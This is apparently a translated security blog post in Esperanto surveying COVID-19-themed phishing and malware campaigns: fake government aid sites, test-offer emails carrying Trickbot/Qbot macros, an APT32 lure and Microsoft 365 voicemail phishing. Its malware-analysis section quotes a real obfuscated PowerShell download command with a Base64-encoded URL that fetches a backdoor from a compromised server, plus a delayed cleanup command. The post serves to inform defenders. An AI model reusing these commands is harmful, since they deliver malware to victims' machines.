Atakantoj daŭre ekspluatas la temon de COVID-19, kreante pli kaj pli da minacoj por uzantoj, kiuj tre interesiĝas pri ĉio rilata al la epidemio. EN Ni jam parolis pri kiaj specoj de malware aperis post la koronavirus, kaj hodiaŭ ni parolos pri sociaj inĝenieraj teknikoj, kiujn uzantoj en diversaj landoj, inkluzive de Rusio, jam renkontis. Ĝeneralaj tendencoj kaj ekzemploj estas sub la tranĉo.
Memoru en Ni parolis pri tio, ke homoj pretas legi ne nur pri la koronavirus kaj la kurso de la epidemio, sed ankaŭ pri financa subtenaj rimedoj? Jen bona ekzemplo. Interesa phishing-atako estis malkovrita en la germana ŝtato Nordrejn-Vestfalio aŭ NRW. La atakantoj kreis kopiojn de la retejo de la Ministerio pri Ekonomio (), kie ĉiu povas peti financan helpon. Tia programo efektive ekzistas, kaj ĝi montriĝis utila por skamantoj. Ricevinte la personajn datumojn de siaj viktimoj, ili faris kandidatiĝon en la reala retejo de la ministerio, sed indikis aliajn bankajn detalojn. Laŭ oficialaj datumoj, 4 mil tiaj falsaj petoj estis faritaj ĝis la skemo estis malkovrita. Kiel rezulto, 109 milionoj USD destinitaj por tuŝitaj civitanoj falis en la manojn de fraŭdantoj.
Ĉu vi ŝatus senpagan teston por COVID-19?
Alia signifa ekzemplo de koronavirus-tema phishing estis en retpoŝtoj. La mesaĝoj altiris la atenton de uzantoj kun oferto por sperti senpagan testadon pri koronavirus-infekto. En la aldono de ĉi tiuj ekzistis kazoj de Trickbot/Qakbot/Qbot. Kaj kiam tiuj, kiuj volis kontroli sian sanon, komencis "plenigi la kunan formularon", malica skripto estis elŝutita al la komputilo. Kaj por eviti sandboxing-testadon, la skripto komencis elŝuti la ĉefan viruson nur post iom da tempo, kiam la protektaj sistemoj estis konvinkitaj, ke neniu malica agado okazos.
Konvinki plej multajn uzantojn ebligi makroojn ankaŭ estis facile. Por fari tion, oni uzis norman lertaĵon: por plenigi la demandaron, vi unue devas ebligi makroojn, kio signifas, ke vi devas ruli VBA-skripton.
Kiel vi povas vidi, la VBA-skripto estas speciale maskita de antivirusoj.
Vindozo havas atendan funkcion kie la aplikaĵo atendas /T <sekundoj> antaŭ ol akcepti la defaŭltan "Jes" respondon. En nia kazo, la skripto atendis 65 sekundojn antaŭ forigi provizorajn dosierojn:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Kaj dum atendado, malware estis elŝutita. Speciala PowerShell-skripto estis lanĉita por ĉi tio:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Post malkodi la Base64-valoron, la PowerShell-skripto elŝutas la malantaŭan pordon situantan sur la antaŭe pirata retservilo el Germanio:
http://automatischer-staubsauger.com/feature/777777.pngkaj konservas ĝin sub la nomo:
C:UsersPublictmpdirfile1.exe
dosierujo ‘C:UsersPublictmpdir’ estas forigita dum rulado de la dosiero 'tmps1.bat' kiu enhavas la komandon cmd /c mkdir ""C:UsersPublictmpdir"".
Celita atako kontraŭ registaraj agentejoj
Krome, analizistoj de FireEye lastatempe raportis celitan APT32-atakon celitan kontraŭ registaraj strukturoj en Vuhano, same kiel la ĉina Ministerio pri Kriz-Administrado. Unu el la distribuitaj RTF-oj enhavis ligon al New York Times artikolo rajtigita . Tamen, leginte ĝin, malware estis elŝutita (FireEye-analizistoj identigis la kazon kiel METALJACK).
Kurioze, en la momento de detekto, neniu el la antivirusoj detektis ĉi tiun kazon, laŭ Virustotal.
Kiam oficialaj retejoj malfunkcias
La plej okulfrapa ekzemplo de phishing-atako okazis en Rusio ĝuste la alian tagon. La kialo de tio estis la nomumo de longe atendita profito por infanoj de 3 ĝis 16 jaroj. Kiam la komenco de akcepto de kandidatiĝoj estis anoncita la 12-an de majo 2020, milionoj rapidis al la retejo de Ŝtataj Servoj por la longe atendita helpo kaj malkonstruis la portalon ne pli malbona ol profesia DDoS-atako. Kiam la prezidanto diris, ke "Registaraj Servoj ne povis elteni la fluon de aplikoj", homoj komencis interrete paroli pri la lanĉo de alternativa retejo por akcepti kandidatiĝojn.
La problemo estas, ke pluraj retejoj ekfunkciis samtempe, kaj dum unu, la vera ĉe posobie16.gosuslugi.ru, efektive akceptas aplikojn, pli .
Kolegoj de SearchInform trovis ĉirkaŭ 30 novajn fraŭdajn domajnojn en la .ru-zono. Infosecurity kaj Softline Company spuris pli ol 70 similajn falsajn registarajn servajn retejojn ekde la komenco de aprilo. Iliaj kreintoj manipulas konatajn simbolojn kaj ankaŭ uzas kombinaĵojn de la vortoj gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, ktp.
Hype kaj socia inĝenierado
Ĉiuj ĉi tiuj ekzemploj nur konfirmas, ke atakantoj sukcese monetigas la temon de koronavirus. Kaj ju pli alta estas la socia streĉiĝo kaj des pli neklaraj aferoj, des pli da ŝancoj, ke skamantoj havas ŝteli gravajn datumojn, devigi homojn rezigni sian monon memstare, aŭ simple haki pli da komputiloj.
Kaj pro tio, ke la pandemio devigis homojn eble nepreparitajn amase labori de hejmo, ne nur personaj, sed ankaŭ kompaniaj datumoj estas en risko. Ekzemple, lastatempe uzantoj de Microsoft 365 (antaŭe Office 365) ankaŭ estis submetitaj al phishing-atako. Homoj ricevis amasajn "maltrafitajn" voĉmesaĝojn kiel aldonaĵojn al leteroj. Tamen, la dosieroj estis fakte HTML-paĝo al kiu sendis viktimojn de la atako . Kiel rezulto, perdo de aliro kaj kompromiso de ĉiuj datumoj de la konto.
fonto: www.habr.com